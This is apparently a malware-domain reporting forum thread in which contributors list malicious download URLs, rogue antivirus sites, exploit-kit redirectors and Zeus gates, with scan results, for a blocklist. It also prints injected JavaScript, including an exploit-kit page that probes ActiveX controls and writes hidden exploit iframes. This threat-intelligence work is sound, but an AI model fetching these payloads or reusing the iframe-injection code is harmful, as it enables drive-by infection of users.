hxxp://down.cvz2.cn/hb/31.exe
hxxp://down.cvz2.cn/hb/32.exe
hxxp://down.cvz2.cn/hb/33.exe
hxxp://down.cvz2.cn/hb/4.exe
hxxp://down.cvz2.cn/hb/5.exe
hxxp://down.cvz2.cn/hb/6.exe
hxxp://down.cvz2.cn/hb/7.exe
hxxp://down.cvz2.cn/hb/8.exe
hxxp://down.cvz2.cn/hb/9.exe
hxxp://down.nihao69.cn/down/ko.exe
hxxp://eiv.baidu.com/other/ff.js
hxxp://facaizhifuok.cn/root/svcos.exe
hxxp://m.c5x8.com/mm.exe
hxxp://qq.caogui03.cn/cha/ca01.exe
hxxp://qq.caogui03.cn/ma/cw01.exe
hxxp://qq.caogui03.cn/ma/cw02.exe
hxxp://qq.caogui03.cn/ma/cw03.exe
hxxp://qq.caogui03.cn/ma/cw04.exe
hxxp://qq.caogui03.cn/ma/cw05.exe
hxxp://qq.caogui03.cn/ma/cw06.exe
hxxp://qq.caogui03.cn/ma/cw07.exe
hxxp://qq.caogui03.cn/ma/cw08.exe
hxxp://qq.caogui03.cn/ma/cw09.exe
hxxp://qq.caogui03.cn/ma/cw10.exe
hxxp://qq.caogui03.cn/ma/cw11.exe
hxxp://qq.caogui03.cn/ma/cw12.exe
hxxp://qq.caogui03.cn/ma/cw14.exe
hxxp://qq.caogui03.cn/ma/cw15.exe
hxxp://qq.caogui03.cn/ma/cw16.exe
hxxp://qq.caogui03.cn/ma/cw17.exe
hxxp://qq.caogui03.cn/ma/cw18.exe
hxxp://qq.caogui03.cn/ma/cw19.exe
hxxp://qq.caogui03.cn/ma/cw20.exe
hxxp://qq.caogui03.cn/ma/cw21.exe
hxxp://qq.caogui03.cn/ma/cw22.exe
hxxp://qq.caogui03.cn/ma/cw23.exe
hxxp://qq.caogui03.cn/ma/cw25.exe
hxxp://qq.caogui03.cn/ma/cw26.exe
hxxp://qq.caogui03.cn/ma/cw28.exe
hxxp://qq.caogui03.cn/ma/cw29.exe
hxxp://qq.caogui03.cn/ma/cw30.exe
hxxp://qq.caogui03.cn/ma/cw31.exe
hxxp://qq.caogui03.cn/ma/sw02.exe
hxxp://qq.caogui03.cn/ma/sw03.exe
hxxp://tom.tom63.cn/liebiao/new.txt
hxxp://tom.tom63.cn/list/01.exe
hxxp://tom.tom63.cn/list/02.exe
hxxp://tom.tom63.cn/list/03.exe
hxxp://tom.tom63.cn/list/04.exe
hxxp://tom.tom63.cn/list/05.exe
hxxp://tom.tom63.cn/list/06.exe
hxxp://tom.tom63.cn/list/07.exe
hxxp://tom.tom63.cn/list/08.exe
hxxp://tom.tom63.cn/list/09.exe
hxxp://tom.tom63.cn/list/10.exe
hxxp://tom.tom63.cn/list/11.exe
hxxp://tom.tom63.cn/list/12.exe
hxxp://tom.tom63.cn/list/14.exe
hxxp://tom.tom63.cn/list/15.exe
hxxp://tom.tom63.cn/list/16.exe
hxxp://tom.tom63.cn/list/17.exe
hxxp://tom.tom63.cn/list/18.exe
hxxp://tom.tom63.cn/list/19.exe
hxxp://tom.tom63.cn/list/20.exe
hxxp://tom.tom63.cn/list/21.exe
hxxp://tom.tom63.cn/list/22.exe
hxxp://tom.tom63.cn/list/24.exe
hxxp://tom.tom63.cn/list/25.exe
hxxp://tom.tom63.cn/list/26.exe
hxxp://txt.50nb.com/update/cs.txt
hxxp://u.uu500.com/a8da234k8asdf.exe
hxxp://ulm-haafeulm-haa.com/blotch/0610.bin
hxxp://www.asmkuang.cn/1.exe
hxxp://www.asmkuang.cn/2/m15.swf
hxxp://www.asmkuang.cn/2/m16.swf
hxxp://www.asmkuang.cn/2/m28.swf
hxxp://www.asmkuang.cn/2/m45.swf
hxxp://www.asmkuang.cn/2/m47.swf
hxxp://www.asmkuang.cn/2/m64.swf
hxxp://www.dabao8.net/ma.exe
hxxp://www.deewoo.net/dl.exe
hxxp://www.deewoo.net/gside.exe
hxxp://www.ffxihn.com/yy/yy.exe
hxxp://www.flash-install.com/Adobe_flash_codec.exe
hxxp://www.flash-install.com/video.swf
hxxp://www.kaolabao.net/bo/BO1024.exe
hxxp://www.kaolabao.net/bo/update.ini
hxxp://www.longlong7.cn/bo/BO1030.exe
hxxp://www.oiuyt.net/ad.jpg
hxxp://www.oiuytr.net/down/ko.exe
hxxp://www.oiuytr.net/new/a255.css
hxxp://www.play0nlink.com/ma/xia.exe
hxxp://www.wq9q.cn/root/svcos.exe
hxxp://www.yipinci.com/upfile/vip.exe
hxxp://www.youxi668.com/ie7.exe
hxxp://www.zyy9888.net/test/13.exe
hxxp://x.ccd6.com/dd/1.exe
hxxp://x.ccd6.com/dd/10.exe
hxxp://x.ccd6.com/dd/2.exe
hxxp://x.ccd6.com/dd/6.exe
hxxp://x.ccd6.com/dd/9.exe
hxxp://x.ccd6.com/dd/x.gif
hxxp://x.ccd6.com/xx.exe
hxxp://2.gooanal.net/sis/getfile.php?f=pdf
Result: 9/36 (25.00%)
http://www.virustotal.com/analisis/70473d5c4c6da5906a23e02a06aa38f5
hxxp://dortumosio.com/11/pdf.php
Result: 11/36 (30.56%)
http://www.virustotal.com/analisis/4ac9dbbd008674a3608d641a6901baa1
-
http://msaknust.com/images/menu.jpg (C:\Windows\BitDefender.exe)
http://www.comprafacilsac.com/r1.exe
https://www.box.net/shared/static/kiur88kidh.exe
http://www.playitontheweb.com/01/img/amigo.exe
http://www.cobrancasweb.com/imagens/imagem.jpg
http://www.cobrancasweb.com/imagens/imagem1.jpg
http://www.oiuytre.net/down/ko.exe
http://www.mensagemevangelica.com.br/download/biblia_digital.exe
http://server.microlite20.com/~admin271/ldr.exe
http://www.staffcop.com/download/staffcop.exe
http://77.93.75.148/img/cntr.dll?sid=D8545F5A4F080F0F000D54585C59595D5D4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D545D282F582F5C2C2B5E585B285D50285D502F2B5128582C5E5D5E2A585A5F5C2C4F081D54502A285A515C5959505F2C5B58582D2D50505D50585C59595D5D282A2F2F2F2F4F1E1D545E505D5B5C0C5B5E59584F0B00545A5B594F04061B1901000D54001B185D4F1B0C1F000D54505D5C5D69B101
http://77.93.75.148/img/cntr.dll?sid=6E545F5A4F080F0F000D54585F5F5A51514F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495A4F0A000D545C2F2B5C502B5150595E5E2B5D2B59502B5A2C282B5F50582B2D585E5E502F5C4F081D545D5C592A2F2A5A59505E5A2D58582D2D50585F59585F5F5A5151282A2F2F2F2F4F1E1D545D5D0B5E5C0C5B5E59584F0B00545A5B594F04061B1901000D54001B185D4F1B0C1F000D54505D5B5F690701
http://77.93.75.148/img/cntr.dll?sid=E0545F5A4F080F0F000D54585F5F5A51514F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495A4F0A000D545E5D502C505C5C5E595B2D285D2F5E2D282A2B5B2D502B2B2F515F2A2F582B504F081D542C2F2F5D2C2F5B5F505F2D2F58582D2D2B5E2C2A585F5F5A5151282A2F2F2F2F4F1E1D54510A0B0B5C0C5B5E59584F0B00545A5B594F04061B1901000D54001B185D4F1B0C1F000D54505D5B5F698901
http://85.17.166.232/form/index.dll?setid=irq4&affid=164573&uid=F12497C0820D11DD9EE5164573CFFFFF&rid=zdez&guid=3B2EA59765304A519BF58B34667106AA
http://85.17.166.232/form/index.dll?setid=an2g&affid=166350&uid=B6D91FFC927D11DD85CB166350CFFFFF&rid=gl2vmclr&guid=251CCB529BF24D359ABDF4494AE0949E
http://85.17.166.232/form/index.dll?setid=irq4&affid=150044&uid=13B8E62A758811DD84E5150044CFFFFF&rid=zdez&guid=605760C6C2F54BBF8701D02E80E28BEC
http://scanner.rapid-antivirus.com/setup/install_4746_NnwzNnwxMDIwMDAwMDAwfHx8fHx8fHw_.exe
http://iabestscan.com/common/destrub.js
-
91.203.93.61/25/2/getfile.php?f=pdf
beshragos.com/work/getfile.php?f=pdf
and some more in this nice article
http://ddanchev.blogspot.com/2008/11/embassy-of-brazil-in-india-compromised.html (http://ddanchev.blogspot.com/2008/11/embassy-of-brazil-in-india-compromised.html)
-
hxxp://uin5.cn
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://sllwbd2.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://sllwbd2.cn/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.zghncsq.cn\/b2.htm width=50 height=0><\/iframe>")
hxxp://sllwbd2.cn/a1/ilink.html
hxxp://sllwbd2.cn/a1/flink.html contain some flash exploits
http://www.virustotal.com/analisis/9bc0c8341d75029f720ae8bccb382691 14/36
http://www.virustotal.com/analisis/366887d40b9994e8652cbe7961fefcf6 14/36
http://www.virustotal.com/analisis/b4fe9309a779516d75886e3222f975b2 14/36
http://www.virustotal.com/analisis/b3618fd15fc152e18089c22a9c97fb65 14/36
http://www.virustotal.com/analisis/18634c476617d3855b49a3901437389d 14/36
hxxp://www.zghncsq.cn/b2.htmtakes you to
hxxp://sllwbd2.cn/a1/fxx.htmwith some more exploits
<script>
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=ss.html></iframe>");
window.status="Íê³É";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=50 height=0 src=MS06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=http://sllwbd2.cn/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxaaaa";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("");
document.write("<iFrame width=100 height=0 src=http://sllwbd2.cn/UU.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("DPClient.Vod");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";document.write("");
</script>
ends up in
hxxp://www.oiuytr.net/new/a11.csshttp://www.virustotal.com/analisis/8ae968467b62acf4b9196cd8f6c287f6
-
hxxp://sutra2s.info/in.cgi?16
hxxp://www.qualityvidz.com/index.php?id=1133&style=black
hxxp://www.wmpinstrument.com/download.php?id=1133
hxxp://porntube08.com/?t_type=amateurs&id=1264
hxxp://cleanlive.net/download/FlashPlayer.v1.264.exe
hxxp://mycigarworld.info/in.cgi?16
hxxp://mymostprivatevideo.com/exclusive2/id/3913000/2/black/white/
hxxp://softwareformyvideo.com/exe2/3913000.exe
hxxp://ieskok.info/in.cgi?6
hxxp://video-4.lovimomentinaslazdaisia.com/
hxxp://scan.scannerantispyware.com/419/6/
hxxp://files.downloadproas2009.com/load/setup_419_6777_.exe
hxxp://fastfind.info/in.cgi?17
hxxp://my-tubemovies-collection.com/promo2/?wmid=328
hxxp://my-tubemovies-collection.com/promo2/get.php?wmid=328&softname=full_dvd_video
hxxp://seaarch.info/in.cgi?11&group=2
hxxp://antivirusdefense.com/2009/1/en/freescan.php?id=77053501
hxxp://antivirusdefense.com/2009/download/trial/A9installertest_77053501.exe
hxxp://skyyy.info/in.cgi
hxxp://www.movzline.com/m5/index.php?id=1387&n=teen&a=usagi&v=309466.88888889
hxxp://www.wmpinstrument.com/download.php?id=1387
-
hxxp://upload.turkbaze.org/1337.exe
hxxp://www.searchcasino.net/everestpoker/download/EverestPoker.exe
hxxp://files.brothersoft.com/chat/miscellaneous/zango.im%20Installer79.exe
hxxp://files.brothersoft.com/games/action/Alien_Shooter_56025.exe
hxxp://files.brothersoft.com/dvd_video/misc_multimedia/regular_plugin.exe
hxxp://files.brothersoft.com/business/accounting_software/1_4_all_Account_lite-install-14218.exe
hxxp://jp.brothersoft.com/upload/13/6255.20071120051301.exe
hxxp://files7.brothersoft.com/utilities/optimize_utilities/mechanic.exe
hxxp://files4.brothersoft.com/chat_e-mail/misc_chat/MyEmoticons.exe
hxxp://files5.brothersoft.com/internet/p2p_file_sharing/KDM-Setup.exe
hxxp://www.indev.no/FlashMute_2.exe
hxxp://www.spytech-web.com/spytechonline/Files/spyagent6.zip
hxxp://files.brothersoft.com/RegNow/xpadvancedkeylogger.exe
hxxp://vip-files.brothersoft.com/ek_setup.exe
hxxp://www.widestep.com/files/ek_setup.exe
hxxp://vip-files.brothersoft.com/keysetup.exe
hxxp://msn-checker-sniffer.jp.brothersoft.com/upload/17/8125.20071115231113.exe
hxxp://files.brothersoft.com/RegNow/modemspy.exe
hxxp://www.brothersoft.com/soft/regnow/sasetup19793.exe
hxxp://files.brothersoft.com/security/keylogger/SoftForYou_Keylogger_33203.exe
hxxp://chariot.tucows.com/files7/Anti_Virus.exe
hxxp://files.brothersoft.com/wallpaper/miscellaneous/wallpaper.exe
hxxp://download.speedbit.com/dap86-bros.exe
hxxp://files.brothersoft.com/dvd_video/misc_multimedia/regular_plugin.exe
hxxp://www.pchell.com/downloads/uninstall2.exe
hxxp://www.pchell.com/downloads/lopuninstall.exe
hxxp://www.pchell.com/checkout.shtml16845/IncrediUninstaller.exe
-
http://111.vvvbw.cn/new/new1.exe
http://111.vvvbw.cn/new/new2.exe
http://111.vvvbw.cn/new/new3.exe
http://111.vvvbw.cn/new/new4.exe
http://111.vvvbw.cn/new/new5.exe
http://111.vvvbw.cn/new/new6.exe
http://111.vvvbw.cn/new/new7.exe
http://111.vvvbw.cn/new/new8.exe
http://111.vvvbw.cn/new/new9.exe
http://222.vvvbw.cn/new/new11.exe
http://222.vvvbw.cn/new/new12.exe
http://222.vvvbw.cn/new/new13.exe
http://222.vvvbw.cn/new/new14.exe
http://222.vvvbw.cn/new/new15.exe
http://222.vvvbw.cn/new/new16.exe
http://222.vvvbw.cn/new/new17.exe
http://222.vvvbw.cn/new/new18.exe
http://222.vvvbw.cn/new/new19.exe
http://333.vvvbw.cn/new/new21.exe
http://333.vvvbw.cn/new/new22.exe
http://333.vvvbw.cn/new/new23.exe
http://333.vvvbw.cn/new/new24.exe
http://333.vvvbw.cn/new/new25.exe
http://333.vvvbw.cn/new/new26.exe
-
epeiy.com/wssl713fro.exe
http://www.virustotal.com/analisis/303be708a68899d8f1bad9591b9b4f89
-
Sites related to Rogue Apps
hxxp://antivirusplus2009.com
hxxp://Antivirus-plus-2009.com
hxxp://Av-online-scan.org
hxxp://spyprotector-pro.com/install.exe
hxxp://sys-scanner.com
hxxp://traffchecking.com/warning/
hxxp://virusandspywarescaning.com
hxxp://watchnetprotection.com/scan/index.php?affid=00200
hxxp://whereismyclick.cn/soft.php?aid=0869&d=1&product=XPA
hxxp://pc-security-scanner.com/2009/1/en/_freescan.php?nu=77001101
-
Sites related to Rogue Apps
Added to list.
-
http://www.bm-740.cn/new/new1.exe
..
http://www.bm-740.cn/new/new24.exe
http://www.threatexpert.com/report.aspx?md5=16146737ffcd2c74d7dd9e7881056172
-
more rogue apps related sites
http://files.proantispyware2009dl.com/load/setup_225_3777_.exe
http://int.proas2009report1.com/stat.php?func=installrun&id=241&landing=3777&lang=EN&sub=0¬stat=1
http://dl.storage-proas2009.com/get/?type=main&pin=241&lnd=3777
files.avnanodl.com/load/setup_243_3777_.exe
http://int.nanoantreport.com/stat.php?func=installrun&id=243&landing=3777&lang=EN&sub=0
http://dl.nanoantexe.com/get/?type=main&pin=243&lnd=3777
real-av.org
http://lsp-test-nax.ind.in/winlogon.htm
http://pmsoftware.biz/cgi-bin/lsp.pl?code=15
proantiviruspcscan.com
http://becomepoweruser.cn/soft.php?aid=0754&d=1&product=XPA
http://best-antivirus-scanner.com/2009/1/freescan.php?nu=77001101
http://clickoverridesystem.cn/soft.php?aid=0754&d=1&product=XPA
http://defendedsystemuser.cn/soft.php?aid=0754&d=1&product=XPA
bestantivirusproscanner.com/2009/1/freescan.php?nu=77001101
livepcantivirusscan.com
http://protectedonlinepayments.com
http://protectionauditview.cn/2008/update.php?ver=
http://securedclickuse.cn/soft.php?aid=0754&d=1&product=XPA
http://securedwwwclicks.com/soft.php?aid=0754&d=1&product=XPA
http://styleonlyclicks.cn/soft.php?aid=0754&d=1&product=XPA
http://trustourclicks.cn/soft.php?aid=0754&d=1&product=XPA
http://whereismyclick.cn/soft.php?aid=0754&d=1&product=XPA
-
more rogue apps related sites
Thank you. Added to list.
-
AV2009 rogue sites: This gang is changing fake/scare scanner sites very frequently >:(
http://bestantivirusdefense.com/2009/1/freescan.php?nu=77001101
http://privatewebsystemupdate.com/download/av_2009glof.exe
-
Spyware Protect 2009 related sites:
av10antivir.com/free_scan.exe
sp-protect2009.com
spwprotect2009.com
spyprotect2009.com
spywprotect2009.com
Spywprotect.com
swp2009.com
-
exploits/trojans
starting at
http://www.44aaaa.com/
redirects to urls where css files are trojans
http://www.44aaaa.com/aa.htm
http://daoye.nm.cn/a38_1104/new.html
http://daoye.nm.cn/real.html
http://user666.66-18.net/re11.css
http://daoye.nm.cn/real.htm
http://user666.66-18.net/re10.css
http://daoye.nm.cn/yy456.htm
http://user666.66-18.net/lz.css
http://daoye.nm.cn/yy123.htm
http://user666.66-18.net/bfyy.css
http://daoye.nm.cn/no.htm
http://user666.66-18.net/no.css
http://daoye.nm.cn/sms.htm
http://user666.66-18.net/sms.css
http://daoye.nm.cn/for.htm
http://user666.66-18.net/for.css
http://daoye.nm.cn/a38_1104/what.htm
http://user666.66-18.net/a38.css
http://daoye.nm.cn/a38_1104/who.htm
-
www.wixks.com/new/new1.exe
www.wixks.com/new/new2.exe
www.wixks.com/new/new3.exe
www.wixks.com/new/new4.exe
www.wixks.com/new/new5.exe
www.wixks.com/new/new6.exe
www.wixks.com/new/new7.exe
www.wixks.com/new/new8.exe
www.wixks.com/new/new9.exe
www.wixks.com/new/new10.exe
www.wixks.com/new/new11.exe
www.wixks.com/new/new12.exe
www.wixks.com/new/new13.exe
www.wixks.com/new/new14.exe
www.wixks.com/new/new15.exe
www.wixks.com/new/new16.exe
www.wixks.com/new/new17.exe
www.wixks.com/new/new18.exe
www.wixks.com/new/new19.exe
www.wixks.com/new/new20.exe
www.wixks.com/new/new21.exe
www.wixks.com/new/new22.exe
www.wixks.com/new/new23.exe
www.wixks.com/new/new24.exe
www.wixks.com/new/new25.exe
www.wixks.com/new/new26.exe
-
"XP Protection Center"
braviax/brastk advertised rogue
http://Xp-protcenter.com/install/Installer.exe
http://Xp-protectioncenter.com/install/Installer.exe
http://Xpprotection-center.com/install/Installer.exe
http://Xp-protection-center.com/install/Installer.exe
http://Xpp-center.com/install/Installer.exe
http://Xppcenter.com/install/Installer.exe
http://xpprot-center.com/install/Installer.exe
http://xpprotcenter.com/install/Installer.exe
http://Xp-p-center.com/install/Installer.exe
http://Xp-pcenter.com/install/Installer.exe
http://Xp-prot-center.com/install/Installer.exe
-
"XP Protection Center"
braviax/brastk advertised rogue
Thanks. Added.
-
I have added many zeus/zbot/wsnpoem urls to list in the last days.
http://www.malwaredomainlist.com/mdl.php?search=zeus%2F&colsearch=All&quantity=50&sort=Date
-
Some pdf exploits
hardmoviesporno.com/rf/exp/update1.pdfAnalysis:
http://wepawet.cs.ucsb.edu/view.php?hash=6e2a9dc53394e4d4f844a91c6e430783&t=1232726861&type=js
http://www.virustotal.com/analisis/ff4c30c4e7bf97019e2595c659191103
hardmoviesporno.com/rf/exp/update2.pdf
Analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=0d64591f2075368ff912ecc5ec7f9cb7&t=1232726875&type=js
http://www.virustotal.com/analisis/6c0c223baa85f44b0342072a51dc3877
-
Rogue pushed through Vxgame Trojan infection
hXXp://antivirusxppro2009.com/cgi-bin/download.pl?code=0000049
antivirusxppro2008.com
-
Rotators
http://diettopseek.cn/in.cgi?cocacola
http://yourliteseek.cn/in.cgi?cocacola
http://litetoplocatesite.cn/in.cgi?cocacola2
http://litepremiumlist.cn/in.cgi?cocacola
http://nanotopfind.cn/in.cgi?cocacola
rotate to
http://murom-hotel.com/system/index.php
http://326g.com/forums/includes/hooks/system/index.php
http://parsrabota.reg36.ru/includes/system/index.php
http://alink.belstom.ru/partners/system/index.php
http://daiwa-cormoran.ru/mods/catalog/acr/system/index.php
http://taraxacum.ru/templates/siteground95/images/system/index.php
http://love-sad.ru/img/system/index.php
http://avtonchik.ru/images/stories/fruit/system/index.php
http://sunucum2.kaliteweb.net/~burctnet/system/index.php
http://ecogroup-vrn.ru/site/i/css/system/index.php
http://demokoksander.nl/recepten/system/index.php
http://2vb.ru/tetisgal/images/system/index.php
exploits from all sites lead to the same file :
http://www.virustotal.com/analisis/1a10833084a81f73b84c2a40f64d6302 2/35 !!!!
Rogue
http://imunizator.net/
best-online-antivirus-scanner.info/scan.php
best-antivirus-2010-scanner.info/scan.php
best-antivirus-2010-download.info/install.php
antivirus-scanner-online.com/scan.php
-
Rogues
http://antispyknight.biz/files/antispyknight.msi
http://antispyknight.info/files/antispyknight.msi
http://total-defender.com/download/total-defender-setup.exe
-
Rogue Winiguard
94.247.2.173/.dif/go.php?sid=1
Redirectors to LuckySploit
94.247.2.50/.dif/go.php?sid=1
94.247.2.52/.dif/go.php?sid=1
94.247.2.157/.dif/go.php?sid=1
-
already posted ... <modified>
hxxp://www.hoho-3.cn/ gr.exe - Downloader
-
IE Security new rogue from IEDefender family.
http://ie-security.com/_download.aspx
http://216.240.151.112/ie.exe
https://secured-software-order.com/iesa2/
-
Related to popups
hxxp://ifengw.com/TT.exe
-
XP Police Antivirus rogue sites: courtesy S!R!
xp-police.com
http://xp-police.com/installed.php?id=dress
http://xp-download-center.com/exe3/dress.exe
-
Sites related to SysAntivirus 2009 rogue application.
sysantivirus2009.com
http://files.sysav-download.com/load/setup_1_1_.exe
http://int.sysreport1.com/stat.php?func=installrun&id=1&landing=1&lang=EN&sub=0
http://dl.sysav-storage.com/get/?type=main&pin=1&lnd=1
http://int.sysreport2.com/stat.php?func=ok
http://int.sysreport1.com/dom1.php
http://sales.buysysantivirus2009.com/pay/MQ==_MA==_RTA5MDUwNzk=/1/
-
Sites related to System Guard 2009 rogue application.
dlsg09.com
dlsgd3.com
getsysgd09.com
sg12scanner.com
sg9scanner.com
systemguard2009.com
systemguard2009m.com
-
Scam sites involved in distributing "Antivirus 2009" Rogue security application
http://internetinterestingplaces.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://pleaseclickhere.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://anti-malware-scanner.com/promo/1/freescan.php?nu=880479
http://antimalware-scanner.com/promo/1/freescan.php?nu=880182
-
hxxp://elkonline.pl/images/eventlist/venues/small/systemhttp://wepawet.cs.ucsb.edu/view.php?hash=b6f6603d951fdcdf047cc3815498ac94&t=1233950001&type=js
-
toppharma.net/123/sorted/pr/system
pixion.nl//foto/gallery/lente/images/systemhttp://wepawet.cs.ucsb.edu/view.php?hash=a247ae9bf05e543a750c686e75f3455b&t=1234013661&type=js
medamphetamin.cn/fffxxx3/http://wepawet.cs.ucsb.edu/view.php?hash=ea313d55e625a0d576848943a6165b9f&t=1234038737&type=js
-
Sites involved in distributing Rogue Security applications
System-tuner.com
Systemsecurityse.com
Electronicbillinghost.com
Securesoftwarepays.com
Xpyburner.com
Xpyburnerpro.com
Hdrivesweeper.com
Hdrivesweeperpro.com
antispyware3000.net
Antivirus2009plus.com
rapidantivirus-09.com
rapid-antivirus-2009.com
rapidantivirus-2009.com
rapid-antivir2009.com
rapidantivirus2009.com
rapidantivirus09.com
extraantivir.com
ie-security-config.com
virus-doctor.com
-
http://xapaxapa.ru/todance1/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=e61e2bc83427a3c841a6ff970b76e249&t=1234120297&type=js
-
Antivirus 2009 related sites..
http://laspaceevents.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://malwareprosecurityscanner.com/promo/1/freescan.php?nu=880182&back==TQw1TD3NEMMMI=O
http://malwareprosecurityscan.com/promo/1/freescan.php?nu=880553&back==zQ02jD3NEMMMI=M
-
Rogues
xpvirusprotection.com
totalmalwareprotection.com
totalvirusprotection.com
Xpvirusprotection2009.com
malware-doc.com
-
av1-download.info
av1-site.info
http://downloads.anti-virus-2010.info/en/exe/StageThree.exe
http://downloads.anti-virus-2010.info/en/exe/StageTwo.exe
http://downloads.anti-virus-2010.info/en/exe/svchost.exe
http://downloads.anti-virus-2010.info/en/exe/QWProtect.dll
-
http://antivirus1-site.info/install.php
http://antivirus1-download.info/en/exe/install.exe
-
www.luckffxi.comhttp://wepawet.cs.ucsb.edu/view.php?hash=8e2190d1410d684b1b814a39b62288bb&t=1235188110&type=js
web.114baines.com/1/index.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=71c5258f6e3d469fabbe0eb372636e40&t=1235188376&type=js
www.hynno8744.cn/1/index.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=dd7e0777ff2996e20f947903e874c8b0&t=1235188509&type=js
down.114anhui.com/1/index.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=d912a96fa590ecfad9a77d60ca4fbcb8&t=1235189761&type=js
www.ffxionlion.com/download/ffxi.exehttp://www.virustotal.com/analisis/4e769eda073397abb033c663022d1ad4
/www.ffxionlion.com/download/wow.exehttp://www.virustotal.com/analisis/5f1fb36b313ecea141a217e086fe02b9
www.ffxionlion.com/download/mj.exehttp://www.virustotal.com/analisis/42ec3ff4dcc6e56fa05951228b43de41
-
reddii.ru/traffic/sploit1/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=98857f2f00af684e185cdc1c165030a2&type=js
-
xp-police-antivirus.com
Xp-police-2009.com
Xp-police-av.com
Xp-police-engine.com
xp-police-09.com
http://files.msdownloadsav.com/codec/codec_200002.exe
http://dl.msantivirstorage.com/get/?pin=200002&lnd=-1&type=main
http://int.ms-asreport1.com/dom1.php
-
hxxp://cccbbbb.cn/1/rr.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=a4d9fe888d4104e456afe2dd8df1367e&t=1235400090&type=js
-
http://stabilityinternetworld.com/download.php?affid=00000
http://stabilityinternetworld.com/install/installpv.exe
http://scanstabilityonline.com/download.php?affid=08100
-
Few Pinches...
hxxp://avto-mashine.freehostia.com/
hxxp://likrion.ho.ua/1.php
hxxp://maxi163.far.ru/maxi/maxi.php
hxxp://rus-shop.info/gate.php
hxxp://test.bboys.tu2.ru/gate.php
hxxp://thelogofpinch.freehostia.com/gate/gate.php
hxxp://www.cybertm.tu1.ru/admin/admin.php
hxxp://www.patr0n87.tu2.ru/reports/gate.php
hxxp://www.teploplast-nn.ru/admin/admin.php
hxxp://www.tihvin.tu2.ru/italy/gate.php
hxxp://ykosty.freehostia.com/gate/
-
ultradant.cn/dis9/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bd77359c919df7385285588e2409df84&t=1235675351&type=js
http://www.virustotal.com/analisis/8222b3a4b72a2b49f689099ff81406b6 14/39
http://divinets.cn/z/5.htmcontains encoded iframes
211.95.79.58/y/index.phpmany exploits
http://wepawet.cs.ucsb.edu/view.php?hash=5648ff6fc1ba1b43bcf2d7abc6770be4&t=1235473451&type=js
dvcd.info/evo/count.php?o=2
flash exploit dvcd.info/evo/exploits/x19.php?o=2&t=1235675434&i=1081047572
pdf exploit dvcd.info/evo/exploits/x18.php?o=2&t=1235675434&i=1081047572
exe dvcd.info/evo/getexe.exe?o=2&t=1235675434&i=1081047572&e=18
flash http://wepawet.cs.ucsb.edu/view.php?hash=c99916c1ad66815a48271f48f8e2db7a&type=swf
pdf http://wepawet.cs.ucsb.edu/view.php?hash=4d136b35fb9c3c50f1a7216b40bed9ed&t=1235677319&type=js
exe http://www.virustotal.com/analisis/3c3290226366784976aeb0c69f9c1517 21/39
prororo7.net/sp/index.php
prororo7.net/sp/s/f.pdfhttp://wepawet.cs.ucsb.edu/view.php?hash=400499d9ab35a63f39552b25f9e04fbd&t=1235678776&type=js
http://www.virustotal.com/analisis/5b9a8bb60a602e71ea377e51ced56aaa 27/39
toureg-cwo.ch/fta/index.phpexploits/zbot
http://wepawet.cs.ucsb.edu/view.php?hash=66bab88192d8490d32e5c60a30231555&t=1235679132&type=js
http://www.virustotal.com/analisis/24b84a42c57c90a1a9dc69c8ae91dd1d 9/38
gavai-pegc9.ws/bI/index.phpexploits, redirects to toureg-cwo.ch
-
findrosain.ru/find/http://wepawet.cs.ucsb.edu/view.php?hash=3c0b4261f5467c208d1c8bd07a2e9a0f&t=1235747603&type=js
findrosain.ru/lovehttp://wepawet.cs.ucsb.edu/view.php?hash=b2636ac6565fdc94e9e2a19cf46941d7&t=1235833030&type=js
-
Av2009 and Av360 Throwaway sites
http://thebestworldparty.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://proantimalwarescan.com/promo/1/freescan.php?nu=880479&back==
http://spaceindustrial.cn/soft.php?aid=0182&d=1&refer=289ce6417
